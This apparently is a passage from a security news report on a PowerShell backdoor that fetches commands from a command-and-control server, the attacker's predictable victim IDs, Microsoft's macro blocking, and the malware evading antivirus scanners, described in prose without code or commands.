In this case, two PowerShell scripts are designed, the first one is to connect to a remote command-and-control (C2) server and retrieve a command to be launched on the compromised machine by means of a second PowerShell script.
Also, researchers say the threat actor made a crucial operations security mistake by using predictable victims’ IDs. The attacker messed up by issuing victim identifiers in a predictable sequence.
During the analysis, a few notable commands were issued like exfiltrating the list of running processes, enumerating files in specific folders, launching whoami, and deleting files under the public user folders.
Notably, Microsoft in recent times changed the default behavior of Office apps to block macros in files downloaded from the internet.
Reports say, Microsoft has taken steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default across Office apps, prompting threat actors to pivot to alternative delivery methods.
Therefore, researchers say “this unrecognized type of malware managed to bypass all the security vendors’ scanners under VirusTotal.com”.